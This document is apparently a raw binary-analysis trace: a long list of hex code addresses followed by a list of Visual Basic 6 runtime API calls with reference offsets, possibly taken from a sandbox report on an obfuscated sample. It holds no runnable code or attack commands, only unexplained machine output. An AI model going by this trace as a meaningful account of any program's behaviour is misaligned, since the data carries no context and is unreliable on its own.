0x0040c31f
0x0040c324
0x0040c327
0x0040c32d
0x0040c332
0x0040c332
0x0040c344
0x0040c34c
0x0040c354
0x0040c360
0x0040c37d
0x0040c362
0x0040c362
0x0040c367
0x0040c36c
0x0040c371
0x0040c371
0x0040c3a1
0x0040c3a5
0x0040c3aa
0x0040c3b0
0x0040c3c5
0x0040c3c8
0x0040c3ca
0x0040c3d7
0x0040c3f9
0x0040c3d9
0x0040c3d9
0x0040c3db
0x0040c3e0
0x0040c3e6
0x0040c3ec
0x0040c3f1
0x0040c3f1
0x0040c407
0x0040c424
0x0040c409
0x0040c409
0x0040c40e
0x0040c413
0x0040c418
0x0040c418
0x0040c448
0x0040c44c
0x0040c451
0x0040c46c
0x0040c46f
0x0040c471
0x0040c47e
0x0040c4a0
0x0040c480
0x0040c480
0x0040c482
0x0040c487
0x0040c48d
0x0040c493
0x0040c498
0x0040c498
0x0040c4ae
0x0040c4cb
0x0040c4b0
0x0040c4b0
0x0040c4b5
0x0040c4ba
0x0040c4bf
0x0040c4bf
0x0040c4ef
0x0040c4f3
0x0040c4f8
0x0040c513
0x0040c516
0x0040c518
0x0040c525
0x0040c547
0x0040c527
0x0040c527
0x0040c529
0x0040c52e
0x0040c534
0x0040c53a
0x0040c53f
0x0040c53f
0x0040c54e
0x0040c558
0x0040c562
0x0040c56b
0x0040c575
0x0040c585
0x0040c58b
0x0040c595
0x0040c5a8
0x0040c5d6
0x0040c5fc
0x0040c608
0x0040c611
0x0040c617
0x0040c61b
0x0040c61f
0x0040c620
0x0040c622
0x0040c630
0x0040c634
0x0040c635
0x0040c637
0x0040c63c
0x0040c646
0x0040c663
0x0040c648
0x0040c648
0x0040c64d
0x0040c652
0x0040c657
0x0040c657
0x0040c687
0x0040c68b
0x0040c690
0x0040c6ab
0x0040c6b1
0x0040c6b3
0x0040c6c0
0x0040c6e5
0x0040c6c2
0x0040c6c2
0x0040c6c7
0x0040c6cc
0x0040c6d2
0x0040c6d8
0x0040c6dd
0x0040c6dd
0x0040c6f3
0x0040c710
0x0040c6f5
0x0040c6f5
0x0040c6fa
0x0040c6ff
0x0040c704
0x0040c704
0x0040c734
0x0040c738
0x0040c73d
0x0040c755
0x0040c75b
0x0040c75d
0x0040c76a
0x0040c78f
0x0040c76c
0x0040c76c
0x0040c771
0x0040c776
0x0040c77c
0x0040c782
0x0040c787
0x0040c787
0x0040c79d
0x0040c7ba
0x0040c79f
0x0040c79f
0x0040c7a4
0x0040c7a9
0x0040c7ae
0x0040c7ae
0x0040c7de
0x0040c7e2
0x0040c7e7
0x0040c802
0x0040c808
0x0040c80a
0x0040c817
0x0040c83c
0x0040c819
0x0040c819
0x0040c81e
0x0040c823
0x0040c829
0x0040c82f
0x0040c834
0x0040c834
0x0040c84a
0x0040c867
0x0040c84c
0x0040c84c
0x0040c851
0x0040c856
0x0040c85b
0x0040c85b
0x0040c88b
0x0040c88f
0x0040c894
0x0040c8af
0x0040c8b5
0x0040c8b7
0x0040c8c4
0x0040c8e9
0x0040c8c6
0x0040c8c6
0x0040c8cb
0x0040c8d0
0x0040c8d6
0x0040c8dc
0x0040c8e1
0x0040c8e1
0x0040c8f7
0x0040c914
0x0040c8f9
0x0040c8f9
0x0040c8fe
0x0040c903
0x0040c908
0x0040c908
0x0040c938
0x0040c93c
0x0040c941
0x0040c959
0x0040c95f
0x0040c961
0x0040c96e
0x0040c993
0x0040c970
0x0040c970
0x0040c975
0x0040c97a
0x0040c980
0x0040c986
0x0040c98b
0x0040c98b
0x0040c9a8
0x0040c9ad
0x0040c9b6
0x0040c9c3
0x0040c9d2
0x0040c9da
0x0040c9e0
0x0040c9ea
0x0040c9ed
0x0040c9fa
0x0040ca07
0x0040ca0e
0x0040ca2e
0x0040ca38
0x0040ca39
0x0040ca3a
0x0040ca3b
0x0040ca4b
0x0040ca51
0x0040ca5e
0x0040ca80
0x0040ca60
0x0040ca60
0x0040ca65
0x0040ca6a
0x0040ca6d
0x0040ca73
0x0040ca78
0x0040ca78
0x0040ca8d
0x0040ca96
0x0040ca9c
0x0040cabb
0x0040cad0
0x0040cad5
0x0040cad8
0x0040cae2
0x0040caf4
0x0040cb01
0x0040cb02
0x0040cb03
0x0040cb04
0x0040cb12
0x0040cb1f
0x0040cb3c
0x0040cb21
0x0040cb21
0x0040cb26
0x0040cb2b
0x0040cb30
0x0040cb30
0x0040cb60
0x0040cb64
0x0040cb69
0x0040cb84
0x0040cb8a
0x0040cb8c
0x0040cb99
0x0040cbbe
0x0040cb9b
0x0040cb9b
0x0040cba0
0x0040cba5
0x0040cbab
0x0040cbb1
0x0040cbb6
0x0040cbb6
0x0040cbcc
0x0040cbe9
0x0040cbce
0x0040cbce
0x0040cbd3
0x0040cbd8
0x0040cbdd
0x0040cbdd
0x0040cc0d
0x0040cc11
0x0040cc16
0x0040cc2e
0x0040cc34
0x0040cc36
0x0040cc43
0x0040cc68
0x0040cc45
0x0040cc45
0x0040cc4a
0x0040cc4f
0x0040cc55
0x0040cc5b
0x0040cc60
0x0040cc60
0x0040cc72
0x0040cc78
0x0040cc82
0x0040cc88
0x0040cc98
0x0040cc9e
0x0040cca8
0x0040ccb2
0x0040ccc5
0x0040ccdb
0x0040cce8
0x0040cce9
0x0040ccea
0x0040cceb
0x0040ccf8
0x0040cd04
0x0040cd0d
0x0040cd13
0x0040cd17
0x0040cd18
0x0040cd1a
0x0040cd28
0x0040cd2c
0x0040cd2d
0x0040cd2f
0x0040cd34
0x0040cd3e
0x0040cd5b
0x0040cd40
0x0040cd40
0x0040cd45
0x0040cd4a
0x0040cd4f
0x0040cd4f
0x0040cd7f
0x0040cd83
0x0040cd88
0x0040cda0
0x0040cda6
0x0040cda8
0x0040cdb5
0x0040cdda
0x0040cdb7
0x0040cdb7
0x0040cdbc
0x0040cdc1
0x0040cdc7
0x0040cdcd
0x0040cdd2
0x0040cdd2
0x0040cde1
0x0040cde3
0x0040cde5
0x0040cdeb
0x0040cdec
0x0040cdf1
0x0040cdfb
0x0040ce18
0x0040cdfd
0x0040cdfd
0x0040ce02
0x0040ce07
0x0040ce0c
0x0040ce0c
0x0040ce3c
0x0040ce40
0x0040ce45
0x0040ce5d
0x0040ce63
0x0040ce65
0x0040ce72
0x0040ce97
0x0040ce74
0x0040ce74
0x0040ce79
0x0040ce7e
0x0040ce84
0x0040ce8a
0x0040ce8f
0x0040ce8f
0x0040cea5
0x0040cec2
0x0040cea7
0x0040cea7
0x0040ceac
0x0040ceb1
0x0040ceb6
0x0040ceb6
0x0040cee6
0x0040ceea
0x0040ceef
0x0040cf0a
0x0040cf10
0x0040cf12
0x0040cf1f
0x0040cf44
0x0040cf21
0x0040cf21
0x0040cf26
0x0040cf2b
0x0040cf31
0x0040cf37
0x0040cf3c
0x0040cf3c
0x0040cf52
0x0040cf6f
0x0040cf54
0x0040cf54
0x0040cf59
0x0040cf5e
0x0040cf63
0x0040cf63
0x0040cf93
0x0040cf97
0x0040cf9c
0x0040cfb4
0x0040cfba
0x0040cfbc
0x0040cfc9
0x0040cfee
0x0040cfcb
0x0040cfcb
0x0040cfd0
0x0040cfd5
0x0040cfdb
0x0040cfe1
0x0040cfe6
0x0040cfe6
0x0040cffc
0x0040d019
0x0040cffe
0x0040cffe
0x0040d003
0x0040d008
0x0040d00d
0x0040d00d
0x0040d033
0x0040d03d
0x0040d041
0x0040d046
0x0040d061
0x0040d064
0x0040d066
0x0040d073
0x0040d095
0x0040d075
0x0040d075
0x0040d077
0x0040d07c
0x0040d082
0x0040d088
0x0040d08d
0x0040d08d
0x0040d09c
0x0040d0a6
0x0040d0b0
0x0040d0bd
0x0040d0c3
0x0040d0cd
0x0040d0d3
0x0040d0e0
0x0040d0e6
0x0040d0f0
0x0040d0f6
0x0040d11e
0x0040d12b
0x0040d12c
0x0040d12d
0x0040d12e
0x0040d136
0x0040d14a
0x0040d14e
0x0040d15c
0x0040d16b
0x0040d173
0x0040d177
0x0040d17b
0x0040d17f
0x0040d183
0x0040d187
0x0040d188
0x0040d18a
0x0040d198
0x0040d19f
0x0040d1a6
0x0040d1aa
0x0040d1ab
0x0040d1ad
0x0040d1b2
0x0040d1bc
0x0040d1d9
0x0040d1be
0x0040d1be
0x0040d1c3
0x0040d1c8
0x0040d1cd
0x0040d1cd
0x0040d1fd
0x0040d201
0x0040d206
0x0040d221
0x0040d224
0x0040d226
0x0040d233
0x0040d255
0x0040d235
0x0040d235
0x0040d237
0x0040d23c
0x0040d242
0x0040d248
0x0040d24d
0x0040d24d
0x0040d263
0x0040d280
0x0040d265
0x0040d265
0x0040d26a
0x0040d26f
0x0040d274
0x0040d274
0x0040d2a4
0x0040d2a8
0x0040d2ad
0x0040d2c5
0x0040d2cb
0x0040d2cd
0x0040d2da
0x0040d2ff
0x0040d2dc
0x0040d2dc
0x0040d2e1
0x0040d2e6
0x0040d2ec
0x0040d2f2
0x0040d2f7
0x0040d2f7
0x0040d30d
0x0040d32a
0x0040d30f
0x0040d30f
0x0040d314
0x0040d319
0x0040d31e
0x0040d31e
0x0040d34e
0x0040d352
0x0040d357
0x0040d372
0x0040d378
0x0040d37a
0x0040d387
0x0040d3ac
0x0040d389
0x0040d389
0x0040d38e
0x0040d393
0x0040d399
0x0040d39f
0x0040d3a4
0x0040d3a4
0x0040d3b9
0x0040d3bf
0x0040d3c6
0x0040d3cd
0x0040d3d7
0x0040d3e7
0x0040d3f3
0x0040d440
0x0040d44c
0x0040d452
0x0040d45a
0x0040d45e
0x0040d462
0x0040d463
0x0040d465
0x0040d46a
0x0040d470
0x0040d47c
0x0040d499
0x0040d47e
0x0040d47e
0x0040d483
0x0040d488
0x0040d48d
0x0040d48d
0x0040d4bd
0x0040d4c1
0x0040d4c6
0x0040d4de
0x0040d4e1
0x0040d4e3
0x0040d4f0
0x0040d512
0x0040d4f2
0x0040d4f2
0x0040d4f4
0x0040d4f9
0x0040d4ff
0x0040d505
0x0040d50a
0x0040d50a
0x0040d520
0x0040d53d
0x0040d522
0x0040d522
0x0040d527
0x0040d52c
0x0040d531
0x0040d531
0x0040d561
0x0040d565
0x0040d56a
0x0040d582
0x0040d588
0x0040d58a
0x0040d597
0x0040d5bc
0x0040d599
0x0040d599
0x0040d59e
0x0040d5a3
0x0040d5a9
0x0040d5af
0x0040d5b4
0x0040d5b4
0x0040d5ca
0x0040d5e7
0x0040d5cc
0x0040d5cc
0x0040d5d1
0x0040d5d6
0x0040d5db
0x0040d5db
0x0040d60b
0x0040d60f
0x0040d614
0x0040d62f
0x0040d632
0x0040d634
0x0040d641
0x0040d663
0x0040d643
0x0040d643
0x0040d645
0x0040d64a
0x0040d650
0x0040d656
0x0040d65b
0x0040d65b
0x0040d66a
0x0040d674
0x0040d684
0x0040d68a
0x0040d697
0x0040d69d
0x0040d6a7
0x0040d6ad
0x0040d6b7
0x0040d6c4
0x0040d6ca
0x0040d6d4
0x0040d6d7
0x0040d6de
0x0040d6e8
0x0040d716
0x0040d720
0x0040d721
0x0040d722
0x0040d723
0x0040d733
0x0040d739
0x0040d746
0x0040d768
0x0040d748
0x0040d748
0x0040d74d
0x0040d752
0x0040d755
0x0040d75b
0x0040d760
0x0040d760
0x0040d77d
0x0040d799
0x0040d79e
0x0040d7a9
0x0040d7af
0x0040d7b1
0x0040d7be
0x0040d7e0
0x0040d7c0
0x0040d7c0
0x0040d7c5
0x0040d7ca
0x0040d7cd
0x0040d7d3
0x0040d7d8
0x0040d7d8
0x00000000
0x0040d7e7
0x0040d7ee
0x0040d80b
0x0040d7f0
0x0040d7f0
0x0040d7f5
0x0040d7fa
0x0040d7ff
0x0040d7ff
0x0040d82f
0x0040d833
0x0040d838
0x0040d853
0x0040d856
0x0040d858
0x0040d865
0x0040d887
0x0040d867
0x0040d867
0x0040d869
0x0040d86e
0x0040d874
0x0040d87a
0x0040d87f
0x0040d87f
0x0040d895
0x0040d8b2
0x0040d897
0x0040d897
0x0040d89c
0x0040d8a1
0x0040d8a6
0x0040d8a6
0x0040d8d6
0x0040d8da
0x0040d8df
0x0040d8f7
0x0040d8fd
0x0040d8ff
0x0040d90c
0x0040d931
0x0040d90e
0x0040d90e
0x0040d913
0x0040d918
0x0040d91e
0x0040d924
0x0040d929
0x0040d929
0x0040d93f
0x0040d95c
0x0040d941
0x0040d941
0x0040d946
0x0040d94b
0x0040d950
0x0040d950
0x0040d980
0x0040d984
0x0040d989
0x0040d9a4
0x0040d9aa
0x0040d9ac
0x0040d9b9
0x0040d9de
0x0040d9bb
0x0040d9bb
0x0040d9c0
0x0040d9c5
0x0040d9cb
0x0040d9d1
0x0040d9d6
0x0040d9d6
0x0040d9eb
0x0040d9f1
0x0040d9f8
0x0040d9ff
0x0040da09
0x0040da19
0x0040da25
0x0040da72
0x0040da7e
0x0040da84
0x0040da8c
0x0040da90
0x0040da94
0x0040da95
0x0040da97
0x0040da9c
0x0040daa2
0x0040daae
0x0040dacb
0x0040dab0
0x0040dab0
0x0040dab5
0x0040daba
0x0040dabf
0x0040dabf
0x0040daef
0x0040daf3
0x0040daf8
0x0040db10
0x0040db13
0x0040db15
0x0040db22
0x0040db44
0x0040db24
0x0040db24
0x0040db26
0x0040db2b
0x0040db31
0x0040db37
0x0040db3c
0x0040db3c
0x0040db52
0x0040db6f
0x0040db54
0x0040db54
0x0040db59
0x0040db5e
0x0040db63
0x0040db63
0x0040db93
0x0040db97
0x0040db9c
0x0040dbb4
0x0040dbba
0x0040dbbc
0x0040dbc9
0x0040dbee
0x0040dbcb
0x0040dbcb
0x0040dbd0
0x0040dbd5
0x0040dbdb
0x0040dbe1
0x0040dbe6
0x0040dbe6
0x0040dbfc
0x0040dc19
0x0040dbfe
0x0040dbfe
0x0040dc03
0x0040dc08
0x0040dc0d
0x0040dc0d
0x0040dc3d
0x0040dc41
0x0040dc46
0x0040dc61
0x0040dc64
0x0040dc66
0x0040dc73
0x0040dc95
0x0040dc75
0x0040dc75
0x0040dc77
0x0040dc7c
0x0040dc82
0x0040dc88
0x0040dc8d
0x0040dc8d
0x0040dc9c
0x0040dca6
0x0040dcb6
0x0040dcbc
0x0040dcc9
0x0040dccf
0x0040dcd9
0x0040dcdf
0x0040dce9
0x0040dcf6
0x0040dcfc
0x0040dd06
0x0040dd09
0x0040dd10
0x0040dd1a
0x0040dd48
0x0040dd52
0x0040dd53
0x0040dd54
0x0040dd55
0x0040dd65
0x0040dd6b
0x0040dd78
0x0040dd9a
0x0040dd7a
0x0040dd7a
0x0040dd7f
0x0040dd84
0x0040dd87
0x0040dd8d
0x0040dd92
0x0040dd92
0x0040dda4
0x0040dda8
0x0040ddac
0x0040ddad
0x0040ddaf
0x0040ddbd
0x0040ddc4
0x0040ddc8
0x0040ddc9
0x0040ddcb
0x0040ddd0
0x0040ddda
0x0040ddf7
0x0040dddc
0x0040dddc
0x0040dde1
0x0040dde6
0x0040ddeb
0x0040ddeb
0x0040de1b
0x0040de1f
0x0040de24
0x0040de3f
0x0040de45
0x0040de47
0x0040de54
0x0040de79
0x0040de56
0x0040de56
0x0040de5b
0x0040de60
0x0040de66
0x0040de6c
0x0040de71
0x0040de71
0x0040de87
0x0040dea4
0x0040de89
0x0040de89
0x0040de8e
0x0040de93
0x0040de98
0x0040de98
0x0040dec8
0x0040decc
0x0040ded1
0x0040dee9
0x0040deef
0x0040def1
0x0040defe
0x0040df23
0x0040df00
0x0040df00
0x0040df05
0x0040df0a
0x0040df10
0x0040df16
0x0040df1b
0x0040df1b
0x0040df2d
0x0040df33
0x0040df3d
0x0040df43
0x0040df53
0x0040df59
0x0040df63
0x0040df6d
0x0040df80
0x0040df96
0x0040df9b
0x0040dfa1
0x0040dfa3
0x0040dfa4
0x0040dfa5
0x0040dfa6
0x0040dfb3
0x0040dfbf
0x0040dfc8
0x0040dfce
0x0040dfd2
0x0040dfd3
0x0040dfd5
0x0040dfe3
0x0040dfe7
0x0040dfe8
0x0040dfea
0x0040dfef
0x0040dff9
0x0040e016
0x0040dffb
0x0040dffb
0x0040e000
0x0040e005
0x0040e00a
0x0040e00a
0x0040e03a
0x0040e03e
0x0040e043
0x0040e05b
0x0040e061
0x0040e063
0x0040e070
0x0040e095
0x0040e072
0x0040e072
0x0040e077
0x0040e07c
0x0040e082
0x0040e088
0x0040e08d
0x0040e08d
0x0040e0a4
0x0040e0a9
0x0040e0b6
0x0040e0bc
0x0040e0c6
0x0040e0c9
0x0040e0e7
0x0040e0ed
0x0040e0fa
0x0040e11c
0x0040e0fc
0x0040e0fc
0x0040e101
0x0040e106
0x0040e109
0x0040e10f
0x0040e114
0x0040e114
0x0040e126
0x0040e12e
0x0040e136
0x0040e13e
0x0040e141
0x00000000
0x00000000
0x0040e147
0x0040e151
0x00000000
0x0040e153
0x0040e160
0x0040e166
0x0040e16d
0x0040e16e
0x0040e1db
0x0040e1e0
0x0040e200
0x0040e200
0x0040e208
0x0040e217
0x0040e221
0x0040e229
0x0040e22c
0x0040e233
0x0040e242
0x0040e24c
0x0040e266
0x0040e24e
0x0040e24e
0x0040e253
0x0040e258
0x0040e25d
0x0040e25d
0x0040e277
0x0040e281
0x0040e285
0x0040e28a
0x0040e28d
0x0040e294
0x0040e29b
0x0040e2a2
0x0040e2a9
0x0040e2b0
0x0040e2ba
0x0040e2c4
0x0040e2c5
0x0040e2c6
0x0040e2c7
0x0040e2cb
0x0040e2d5
0x0040e2d6
0x0040e2d7
0x0040e2d8
0x0040e2dc
0x0040e2e6
0x0040e2e7
0x0040e2e8
0x0040e2e9
0x0040e2f1
0x0040e2fc
0x0040e302
0x0040e304
0x0040e30b
0x0040e327
0x0040e30d
0x0040e30d
0x0040e312
0x0040e317
0x0040e31a
0x0040e31d
0x0040e322
0x0040e322
0x0040e32e
0x0040e333
0x0040e334
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004011F6), ref: 0040C138
__vbaLenBstrB.MSVBVM60(0040B3BC,?,?,?,?,004011F6), ref: 0040C16C
__vbaChkstk.MSVBVM60 ref: 0040C1A5
__vbaChkstk.MSVBVM60 ref: 0040C1B9
__vbaHresultCheckObj.MSVBVM60(00000000,00401148,0040B0E8,000002B0), ref: 0040C1FC
__vbaNew2.MSVBVM60(0040A810,`os,0040B3BC,?,?,?,?,004011F6), ref: 0040C223
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C25C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B3C0,000000F8), ref: 0040C2A6
__vbaStrCopy.MSVBVM60(00000000,?,0040B3C0,000000F8), ref: 0040C2C2
__vbaHresultCheckObj.MSVBVM60(00000000,00401148,0040B118,000006FC), ref: 0040C32D
__vbaFreeStr.MSVBVM60(00000000,00401148,0040B118,000006FC), ref: 0040C344
__vbaF.MSVBVM60(00000000,00401148,0040B118,000006FC), ref: 0040C34C
__vbaFreeVar.MSVBVM60(00000000,00401148,0040B118,000006FC), ref: 0040C354
__vbaNew2.MSVBVM60(0040A810,`os), ref: 0040C36C
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C3A5
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B438,00000060), ref: 0040C3EC
__vbaNew2.MSVBVM60(0040A810,`os), ref: 0040C413
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C44C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040B3C0,00000060), ref: 0040C493
__vbaNew2.MSVBVM60(0040A810,`os), ref: 0040C4BA
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C4F3
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B438,00000060), ref: 0040C53A
__vbaVarDup.MSVBVM60(00000000,?,0040B438,00000060), ref: 0040C5A8
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0040C622
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,004011F6), ref: 0040C637
__vbaNew2.MSVBVM60(0040A810,`os,?,?,?,?,?,?,004011F6), ref: 0040C652
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C68B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B3C0,00000178), ref: 0040C6D8
__vbaNew2.MSVBVM60(0040A810,`os), ref: 0040C6FF
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C738
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B438,00000120), ref: 0040C782
__vbaNew2.MSVBVM60(0040A810,`os), ref: 0040C7A9
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C7E2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B3C0,000000E0), ref: 0040C82F
__vbaNew2.MSVBVM60(0040A810,`os), ref: 0040C856
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C88F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B468,000000E8), ref: 0040C8DC
__vbaNew2.MSVBVM60(0040A810,`os), ref: 0040C903
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C93C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B438,000000F0), ref: 0040C986
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040C9A8
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,004011F6), ref: 0040C9D2
__vbaI4Var.MSVBVM60(?,?), ref: 0040CA0E
__vbaChkstk.MSVBVM60(?,?,?,0001C0C4,00000000,?,?), ref: 0040CA2E
__vbaHresultCheckObj.MSVBVM60(00000000,00401148,0040B118,00000700), ref: 0040CA73
__vbaFreeStr.MSVBVM60(00000000,00401148,0040B118,00000700), ref: 0040CA9C
__vbaFreeObjList.MSVBVM60(00000006,?,?,?,?,?,?), ref: 0040CABB
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0040CAD0
__vbaChkstk.MSVBVM60(snydertampenes), ref: 0040CAF4
__vbaNew2.MSVBVM60(0040A810,`os), ref: 0040CB2B
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040CB64
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B438,00000128), ref: 0040CBB1
__vbaNew2.MSVBVM60(0040A810,`os), ref: 0040CBD8
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040CC11
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B438,00000120), ref: 0040CC5B
__vbaVarDup.MSVBVM60(00000000,?,0040B438,00000120), ref: 0040CCC5
__vbaChkstk.MSVBVM60(00000009,?), ref: 0040CCDB
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040CD1A
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0040CD2F
__vbaNew2.MSVBVM60(0040A810,`os), ref: 0040CD4A
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040CD83
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B468,000000B0), ref: 0040CDCD
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040CDEC
__vbaNew2.MSVBVM60(0040A810,`os), ref: 0040CE07
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0040CE40
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B438,00000148), ref: 0040CE8A
__vbaNew2.MSVBVM60(0040A810,`os), ref: 0040CEB1
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040CEEA
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B438,00000080), ref: 0040CF37
__vbaNew2.MSVBVM60(0040A810,`os), ref: 0040CF5E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040CF97
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B3C0,00000170), ref: 0040CFE1
__vbaNew2.MSVBVM60(0040A810,`os), ref: 0040D008
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D041
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B3C0,00000060), ref: 0040D088
__vbaChkstk.MSVBVM60(?,008789B5,00000003,?), ref: 0040D11E
__vbaI4Var.MSVBVM60(?,00000008,8E1C83F0,00005AF9,?,?,008789B5,00000003,?), ref: 0040D14E
__vbaVarMove.MSVBVM60(?,?,008789B5,00000003,?), ref: 0040D16B
__vbaFreeObjList.MSVBVM60(00000006,?,00000000,?,?,?,?,?,?,008789B5,00000003,?), ref: 0040D18A
__vbaFreeVarList.MSVBVM60(00000004,?,00000008,00000009,?), ref: 0040D1AD
__vbaNew2.MSVBVM60(0040A810,`os), ref: 0040D1C8
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D201
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B3C0,00000060), ref: 0040D248
__vbaNew2.MSVBVM60(0040A810,`os), ref: 0040D26F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D2A8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B3C0,000000F8), ref: 0040D2F2
__vbaNew2.MSVBVM60(0040A810,`os), ref: 0040D319
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0040D352
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B3C0,00000128), ref: 0040D39F
__vbaFreeStr.MSVBVM60 ref: 0040D452
__vbaFreeObjList.MSVBVM60(00000003,?,?,00000000), ref: 0040D465
__vbaFreeVar.MSVBVM60 ref: 0040D470
__vbaNew2.MSVBVM60(0040A810,`os), ref: 0040D488
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D4C1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B438,00000050), ref: 0040D505
__vbaNew2.MSVBVM60(0040A810,`os), ref: 0040D52C
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D565
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B3C0,00000170), ref: 0040D5AF
__vbaNew2.MSVBVM60(0040A810,`os), ref: 0040D5D6
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D60F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B3C0,00000060), ref: 0040D656
__vbaChkstk.MSVBVM60(002900F5,Dlgsmaals,00000009,00000003,0B47A6A0), ref: 0040D716
__vbaHresultCheckObj.MSVBVM60(00000000,00401148,0040B118,00000704), ref: 0040D75B
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0040D77D
__vbaFreeVarList.MSVBVM60(00000003,00000008,00000009,00000003), ref: 0040D799
__vbaHresultCheckObj.MSVBVM60(00000000,00401148,0040B0E8,000002B4), ref: 0040D7D3
__vbaNew2.MSVBVM60(0040A810,`os), ref: 0040D7FA
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D833
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B3C0,00000060), ref: 0040D87A
__vbaNew2.MSVBVM60(0040A810,`os,00000000,?,0040B3C0,00000060), ref: 0040D8A1
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D8DA
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040B3C0,000000F8), ref: 0040D924
__vbaNew2.MSVBVM60(0040A810,`os,00000000,00000000,0040B3C0,000000F8), ref: 0040D94B
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0040D984
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B3C0,00000128), ref: 0040D9D1
__vbaFreeStr.MSVBVM60 ref: 0040DA84
__vbaFreeObjList.MSVBVM60(00000003,?,?,00000000), ref: 0040DA97
__vbaFreeVar.MSVBVM60 ref: 0040DAA2
__vbaNew2.MSVBVM60(0040A810,`os), ref: 0040DABA
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040DAF3
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B438,00000050), ref: 0040DB37
__vbaNew2.MSVBVM60(0040A810,`os,00000000,?,0040B438,00000050), ref: 0040DB5E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040DB97
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040B3C0,00000170), ref: 0040DBE1
__vbaNew2.MSVBVM60(0040A810,`os,00000000,00000000,0040B3C0,00000170), ref: 0040DC08
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040DC41
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B3C0,00000060), ref: 0040DC88
__vbaChkstk.MSVBVM60(002900F5,Dlgsmaals,00000009,00000003,0B47A6A0), ref: 0040DD48
__vbaHresultCheckObj.MSVBVM60(00000000,00401148,0040B118,00000704), ref: 0040DD8D
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0040DDAF
__vbaFreeVarList.MSVBVM60(00000003,00000008,00000009,00000003), ref: 0040DDCB
__vbaNew2.MSVBVM60(0040A810,`os,?,?,?,?,?,?,0040A810,`os), ref: 0040DDE6
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040DE1F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B438,00000128), ref: 0040DE6C
__vbaNew2.MSVBVM60(0040A810,`os,00000000,?,0040B438,00000128), ref: 0040DE93
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040DECC
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040B438,00000120), ref: 0040DF16
__vbaVarDup.MSVBVM60(00000000,00000000,0040B438,00000120), ref: 0040DF80
__vbaChkstk.MSVBVM60(00000009,F61631D0), ref: 0040DF96
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040DFD5
__vbaFreeVarList.MSVBVM60(00000002,00000008,00000009), ref: 0040DFEA
__vbaNew2.MSVBVM60(0040A810,`os,?,?,?,?,0040A810,`os,?,?,?,?,?,?,0040A810,`os), ref: 0040E005
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E03E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B3C0,000000F8), ref: 0040E088
__vbaStrCopy.MSVBVM60(00000000,?,0040B3C0,000000F8), ref: 0040E0A4
__vbaHresultCheckObj.MSVBVM60(00000000,00401148,0040B118,000006FC), ref: 0040E10F
